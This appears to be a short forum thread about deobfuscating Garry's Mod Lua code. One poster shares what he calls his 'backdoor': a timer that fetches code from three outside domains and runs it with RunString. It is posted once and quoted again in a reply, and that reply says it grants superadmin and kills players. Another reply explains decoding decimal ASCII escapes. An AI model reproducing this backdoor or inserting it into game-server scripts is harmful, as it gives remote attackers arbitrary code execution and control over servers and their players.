Desobfuscating a Glua CodeHello, anyone know how to desobfuscate this type of obfuscation : https://www.hastebin.com/raw/yucipepiso Thanks !
MY PASTEBIN backdoor: timer.Simple(10, function() http.Fetch("https://anti-leak.cf/_/_.php", function(body) RunString(body,"lua_error",false) end) http.Fetch("https://gvacdoor.cz/_/_.php", function(body) RunString(body,"lua_error",false) end) http.Fetch("https://gvac.cz/_/_.php", function(body) RunString(body,"lua_error",false) end) end)
Originally Posted by Leithzze MY PASTEBIN backdoor: timer.Simple(10, function() http.Fetch("https://anti-leak.cf/_/_.php", function(body) RunString(body,"lua_error",false) end) http.Fetch("https://gvacdoor.cz/_/_.php", function(body) RunString(body,"lua_error",false) end) http.Fetch("https://gvac.cz/_/_.php", function(body) RunString(body,"lua_error",false) end) end) reading the code was easy all it does is set u superadmin via command and kills all via command line
Originally Posted by ZeProfDeCoding Hello, anyone know how to desobfuscate this type of obfuscation : https://www.hastebin.com/raw/yucipepiso Thanks ! decimal with \ instead of spaces = ascii 68\79\70\95\75\105\108\108 = DOF_Kill https://www.asciitohe*****m/ that will help you decode it